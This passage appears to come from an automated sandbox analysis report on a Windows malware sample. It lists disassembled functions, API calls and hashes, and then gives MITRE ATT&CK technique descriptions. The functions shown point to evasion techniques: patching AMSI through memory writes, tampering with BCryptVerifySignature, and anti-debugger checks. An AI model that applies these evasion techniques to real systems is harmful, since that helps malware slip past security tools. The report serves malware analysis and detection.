QueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
API String ID: 4004194653-1225450241
Opcode ID: 649d75744e524ea1ba674236d0d6ba02ba4af1513b27a2a1af460c6b7e411d00
Instruction ID: 6c1e2a4877686e66390d83081dad08db2f12d0f90c622acbbe593711da96208c
Opcode Fuzzy Hash: 649d75744e524ea1ba674236d0d6ba02ba4af1513b27a2a1af460c6b7e411d00
Instruction Fuzzy Hash: CC43F876B401589FDB11FB64DD909DE73BABF94300F2045EAE10AA7218DB31AF968F41

Function 02BC1727 Relevance: 9.0, APIs: 7, Instructions: 288
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000), ref: 02BC17D0
Sleep.KERNEL32(0000000A,00000000), ref: 02BC17E6

Memory Dump Source

Source File: 00000016.00000002.2428735125.0000000002BC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2bc1000_Oupzhkpr.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 3b9e03e425e7f3fccdbc7018bcf27ac0bc4cbbae9d8eec1c2eefbad62a8d544a
Instruction ID: c5381f9b941650d7132a5041072ac86583c1d2be3d2ae68168e3947ca64c3841
Opcode Fuzzy Hash: 3b9e03e425e7f3fccdbc7018bcf27ac0bc4cbbae9d8eec1c2eefbad62a8d544a
Instruction Fuzzy Hash: EEB11276A143518BEB15CF2CD880355BBE1FF86310F2886EED959EB386D770A461CB90

Function 02BD8798 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(?,?), ref: 02BD87AC
GetProcAddress.KERNEL32(02C21390,BCryptVerifySignature), ref: 02BD87C6
FreeLibrary.KERNEL32(02C21390,02C21390,BCryptVerifySignature,bcrypt,?,02C213D0,00000000,02C213A4,02BDA3BF,ScanString,02C213A4,02BDA774,ScanBuffer,02C213A4,02BDA774,Initialize), ref: 02BD8802

Part of subcall function 02BD7CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02BD7D6C

Strings

BCryptVerifySignature, xrefs: 02BD87BF
bcrypt, xrefs: 02BD87AB

Memory Dump Source

Source File: 00000016.00000002.2428735125.0000000002BC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2bc1000_Oupzhkpr.jbxd

Similarity

API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
String ID: BCryptVerifySignature$bcrypt
API String ID: 1002360270-4067648912
Opcode ID: f624dd9365abbbf0e33c3adc3b60a8f750c01104b6b56673bb421d28ca974486
Instruction ID: 40d7bc5506e7ec63b8eccac3af88c7ae077f458b04e7efe75c82cf0b767a5f9e
Opcode Fuzzy Hash: f624dd9365abbbf0e33c3adc3b60a8f750c01104b6b56673bb421d28ca974486
Instruction Fuzzy Hash: 1BF0A471A922286EEB20EB69AA44FB6779ED380355F0A0A7DB10C87542DFF158188B50

Function 02BD8704 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 35
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(amsi), ref: 02BD870D

Part of subcall function 02BD80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02BD8113
Part of subcall function 02BD80C0: GetProcAddress.KERNEL32(?,?), ref: 02BD8125

Part of subcall function 02BD7CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02BD7D6C

FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02BD876C

Strings

W, xrefs: 02BD8719
DllGetClassObject, xrefs: 02BD8732
amsi, xrefs: 02BD8708

Memory Dump Source

Source File: 00000016.00000002.2428735125.0000000002BC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2bc1000_Oupzhkpr.jbxd

Similarity

API ID: AddressLibraryProc$FreeLoadMemoryVirtualWrite
String ID: DllGetClassObject$W$amsi
API String ID: 2980007069-2671292670
Opcode ID: f5ebcc5a37a0d726a768f85cc82c7a3a13e30b286232038b98fab1a16662d144
Instruction ID: 4bfeb595d9a4f38768667c67e4cc0ab7d08646b791819bd1efed1fbd888d73bd
Opcode Fuzzy Hash: f5ebcc5a37a0d726a768f85cc82c7a3a13e30b286232038b98fab1a16662d144
Instruction Fuzzy Hash: 6BF0C26054C381B9E201E6788C45FCBBFCD4B92324F448E9DB1F85A2D2EA79D1059BB7

Function 02BDEBE8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(KernelBase), ref: 02BDEBF8
GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02BDEC0A
CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02BDEC21

Strings

KernelBase, xrefs: 02BDEBF3
CheckRemoteDebuggerPresent, xrefs: 02BDEC04

Memory Dump Source

Source File: 00000016.00000002.2428735125.0000000002BC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2bc1000_Oupzhkpr.jbxd

Similarity

API ID: AddressCheckDebuggerHandleModulePresentProcRemote
String ID: CheckRemoteDebuggerPresent$KernelBase
API String ID: 35162468-539270669
Opcode ID: a358fb7d109c22ec1638a5c3f622db4196bb0e6eba1d1d1b394ac5831b1fcc98
Instruction ID: c4dbcdaa0ae491328975ddc60c20d04791b7fd0e4d25c927f6ef6efb1c8caf70
Opcode Fuzzy Hash: a358fb7d109c22ec1638a5c3f622db4196bb0e6eba1d1d1b394ac5831b1fcc98
Instruction Fuzzy Hash: 01F0A73090424CAED712A7EC88887DCFBA99B05328F680BD4A464751D1F7715640C651

Function 02BC1A8F Relevance: 7.7, APIs: 6, Instructions: 173
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000), ref: 02BC1B17
Sleep.KERNEL32(0000000A,00000000), ref: 02BC1B31

Memory Dump Source

Source File: 00000016.00000002.2428735125.0000000002BC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2bc1000_Oupzhkpr.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: fc4fda0f660dea1d4d849aa9ffaa128f1832c03af0f4a5e33d7e25ff071fb35c
Instruction ID: 647f1e294043990e69203b0cc348e0d35cd53ab8ddb31af2f55ed1672b65922e
Opcode Fuzzy Hash: fc4fda0f660dea1d4d849aa9ffaa128f1832c03af0f4a5e33d7e25ff071fb35c
Instruction Fuzzy Hash: E351BE756212408FE715CF6CC984756BBD0EF46314F2886EEE988EB287E770D445CBA1

Function 02BD8406 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02BD8018: GetModuleHandleA.KERNELBASE(?), ref: 02BD806A

Part of subcall function 02BD80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02BD8113
Part of subcall function 02BD80C0: GetProcAddress.KERNEL32(?,?), ref: 02BD8125

WinExec.KERNEL32(?,?), ref: 02BD8470

Strings

WinExec, xrefs: 02BD8421
Kernel32, xrefs: 02BD8453

Memory Dump Source

Source File: 00000016.00000002.2428735125.0000000002BC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2bc1000_Oupzhkpr.jbxd

Similarity

API ID: AddressProc$ExecHandleModule
String ID: Kernel32$WinExec
API String ID: 3402293670-3609268280
Opcode ID: 8dbd548ecb687c6f006f84467ac725182bb89bfbc2d69b2e358fd677300aa2f8
Instruction ID: 5ed786da6bd61ca1ae1687a793d9bc383568326239cb93dffaba5abb78075cdd
Opcode Fuzzy Hash: 8dbd548ecb687c6f006f84467ac725182bb89bfbc2d69b2e358fd677300aa2f8
Instruction Fuzzy Hash: DD01D635640208BFE710EFA5DC11B9A77FEE708710F6584A0B508C7500EAB4BE008F24

Function 02BD8408 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45processCOMMON

Download Yara Rule

APIs

Part of subcall function 02BD8018: GetModuleHandleA.KERNELBASE(?), ref: 02BD806A

Part of subcall function 02BD80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02BD8113
Part of subcall function 02BD80C0: GetProcAddress.KERNEL32(?,?), ref: 02BD8125

WinExec.KERNEL32(?,?), ref: 02BD8470

Strings

WinExec, xrefs: 02BD8421
Kernel32, xrefs: 02BD8453

Memory Dump Source

Source File: 00000016.00000002.2428735125.0000000002BC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2bc1000_Oupzhkpr.jbxd

Similarity

API ID: AddressProc$ExecHandleModule
String ID: Kernel32$WinExec
API String ID: 3402293670-3609268280
Opcode ID: 6ed4597d860bc71319528d94c711687bde3bebd8784aa9afefd0ca04cd1ea076
Instruction ID: 2f38a447cd457df8f9f96c0a50c3d893448ac22d1d330972d958d1c28d201279
Opcode Fuzzy Hash: 6ed4597d860bc71319528d94c711687bde3bebd8784aa9afefd0ca04cd1ea076
Instruction Fuzzy Hash: BDF0F935640208BFE710EFA5DC11F8A77FEE708710F6584A0B508C7500EAB4BA008F24

Function 02BD881C Relevance: 4.6, APIs: 3, Instructions: 65libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02BD8903), ref: 02BD8860
GetProcAddress.KERNEL32(02C21384,00000000), ref: 02BD8879

Part of subcall function 02BD7CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02BD7D6C

FreeLibrary.KERNEL32(02C21384,00000000,02C21388,Function_000055D8,00000004,02C21398,02C21388,000186A3,00000040,02C2139C,02C21384,00000000,00000000,00000000,00000000,02BD8903), ref: 02BD88E3

Memory Dump Source

Source File: 00000016.00000002.2428735125.0000000002BC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2bc1000_Oupzhkpr.jbxd

Similarity

API ID: AddressFreeHandleLibraryMemoryModuleProcVirtualWrite
String ID:
API String ID: 3588955079-0
Opcode ID: 24ab985b0852dc593805f6334e3121342722098b9995dc8ab67a82e9a2e58a2a
Instruction ID: 483d24a621c97a85ba7aad152d8633f866464412aec9686be7c87e4710362ec6
Opcode Fuzzy Hash: 24ab985b0852dc593805f6334e3121342722098b9995dc8ab67a82e9a2e58a2a
Instruction Fuzzy Hash: CF117F71A40314AFEB10FBA8CE11E9E77AE9B84710F6604F8760CA7A41DEB4DE008B14

Function 02BC4168 Relevance: 3.1, APIs: 2, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2428735125.0000000002BC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2bc1000_Oupzhkpr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 198179651190d95c7ae7bae729b6b2db0cecab20e8456ee8fd15452ea8f0fde0
Instruction ID: 410adb53e691b7d32720cab56b0abe3cdbf43b27abefee3b2e9172a28ee9c1b4
Opcode Fuzzy Hash: 198179651190d95c7ae7bae729b6b2db0cecab20e8456ee8fd15452ea8f0fde0
Instruction Fuzzy Hash: 2341A974C10200DFDB24DF28E0A875A3BF1FB55724F3989AEE8089B241CB749A95CF91

Function 02BC5814 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(209D1B20,?,00000105), ref: 02BC5832

Part of subcall function 02BC5A78: GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 02BC5A94
Part of subcall function 02BC5A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02BC5AB2
Part of subcall function 02BC5A78: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02BC5AD0
Part of subcall function 02BC5A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02BC5AEE
Part of subcall function 02BC5A78: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,02BC5B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02BC5B37
Part of subcall function 02BC5A78: RegQueryValueExA.ADVAPI32(?,02BC5CE4,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,02BC5B7D,?,80000001), ref: 02BC5B55
Part of subcall function 02BC5A78: RegCloseKey.ADVAPI32(?,02BC5B84,00000000,00000000,00000005,00000000,02BC5B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02BC5B77

Memory Dump Source

Source File: 00000016.00000002.2428735125.0000000002BC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2bc1000_Oupzhkpr.jbxd

Similarity

API ID: Open$FileModuleNameQueryValue$Close
String ID:
API String ID: 2796650324-0
Opcode ID: 8d2262c70beaae2bbfdede8a2f275eb551cfb6ca49d82510be69373b1f735333
Instruction ID: 09c001ac218ea662347d9f1920546c90498798a8f042006f1941e719b0278e36
Opcode Fuzzy Hash: 8d2262c70beaae2bbfdede8a2f275eb551cfb6ca49d82510be69373b1f735333
Instruction Fuzzy Hash: 5DE06D71A002148BCB24DE5C88C0A4637D8AB08750F5005A9EC58EF34AD370F9608BD0

Function 02BC7E34 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,02BE2A41,ScanString,02C1CF00,02BEAFD0,OpenSession,02C1CF00,02BEAFD0,ScanBuffer,02C1CF00,02BEAFD0,OpenSession,02C1CF00,02BEAFD0,Initialize), ref: 02BC7E3F

Memory Dump Source

Source File: 00000016.00000002.2428735125.0000000002BC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2bc1000_Oupzhkpr.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: f224b653ec22911d66b4e12bae26b762512d9a06ebf858662df5de79d6ddce78
Instruction ID: 3f3f9df70671c453fa6129c4682d78f5f378bae80886c909db1f9002ac080a1b
Opcode Fuzzy Hash: f224b653ec22911d66b4e12bae26b762512d9a06ebf858662df5de79d6ddce78
Instruction Fuzzy Hash: 4CC08CE22022090F1E90A2FC0CC490A428C8B441383B02FE9E638C61D2DB21D8523810

Function 02BEBB48 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

timeSetEvent.WINMM ref: 02BEBB58

Memory Dump Source

Source File: 00000016.00000002.2428735125.0000000002BC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2bc1000_Oupzhkpr.jbxd

Similarity

API ID: Eventtime
String ID:
API String ID: 2982266575-0
Opcode ID: 7569ee3d954793ba1e20d03a7cc28807cfd7731bc36eb8a14ecf235733cb6c16
Instruction ID: bf5f999bd23d6134a6f4eb65104e56918abc8802b74151fcc918146db0753293
Opcode Fuzzy Hash: 7569ee3d954793ba1e20d03a7cc28807cfd7731bc36eb8a14ecf235733cb6c16
Instruction Fuzzy Hash: ADC092F27903403EFA10A6B86CC2F231A8DE354B01F6004A6BA05EE6C2D2EA4C504A74

Function 02BC4BE4 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON

Download Yara Rule

APIs

SysAllocStringLen.OLEAUT32(00000000,?), ref: 02BC4BEB

Memory Dump Source

Source File: 00000016.00000002.2428735125.0000000002BC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2bc1000_Oupzhkpr.jbxd

Similarity

API ID: AllocString
String ID:
API String ID: 2525500382-0
Opcode ID: db6a3f861f0a6b35b86245416a4c288905a5a0e602f748b147a7570e0d217214
Instruction ID: b4833b6671f65ecead18600a33e5a1964163a79c59501dc7c34b1d1ae95d1035
Opcode Fuzzy Hash: db6a3f861f0a6b35b86245416a4c288905a5a0e602f748b147a7570e0d217214
Instruction Fuzzy Hash: 59B0123C2482021AFE1013610D10B3210AC8B60387FB400DD9E29DC0C4FF00C1008832

Function 02BC4BFC Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 02BC4C03

Memory Dump Source

Source File: 00000016.00000002.2428735125.0000000002BC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2bc1000_Oupzhkpr.jbxd

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: 6fc0f88f0b4d12cbeda0546aa3c9b2a61d9b338520cfab902635a24ef7a42f2a
Instruction ID: 1c93081567378a8302c9b55ab6c48e396bc0ffc36120f28d1fdfec3ee0027b4c
Opcode Fuzzy Hash: 6fc0f88f0b4d12cbeda0546aa3c9b2a61d9b338520cfab902635a24ef7a42f2a
Instruction Fuzzy Hash: 24A022EC0003030A8F0B232C80A002B2033BFE03003FAC0EC00002E028CF3AC000AC30

Function 02BC1682 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00101000,00000004), ref: 02BC16A4

Memory Dump Source

Source File: 00000016.00000002.2428735125.0000000002BC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2bc1000_Oupzhkpr.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 3d54eb0cd02876da3bdae10ab14431b38b4d65407396c1b4a55fc86c32f0f7bf
Instruction ID: 384680dbdd6076fc07c2c6f613218b64fc7f810850634b605ce5760218fcfd71
Opcode Fuzzy Hash: 3d54eb0cd02876da3bdae10ab14431b38b4d65407396c1b4a55fc86c32f0f7bf
Instruction Fuzzy Hash: D4F0B4B2B507956BD7209F5E9C80782BB94FB10714F15427EF94CAB341DB70A8148FD4

Function 02BC16E6 Relevance: 1.3, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000), ref: 02BC1704

Memory Dump Source

Source File: 00000016.00000002.2428735125.0000000002BC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2bc1000_Oupzhkpr.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 1e738411f6b81446eb567fddd29c527c670716050f4d422adc8ac2d33bac774d
Instruction ID: 0f570e45b86776ce2ea6f7aeaeeb2e5f2edb6d75026eb896923db2460bb1c538
Opcode Fuzzy Hash: 1e738411f6b81446eb567fddd29c527c670716050f4d422adc8ac2d33bac774d
Instruction Fuzzy Hash: 48E026B53203006FE7205E3D4C407127BC8EB44730F3446BEF149EB2C2C2A0D8008B60

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

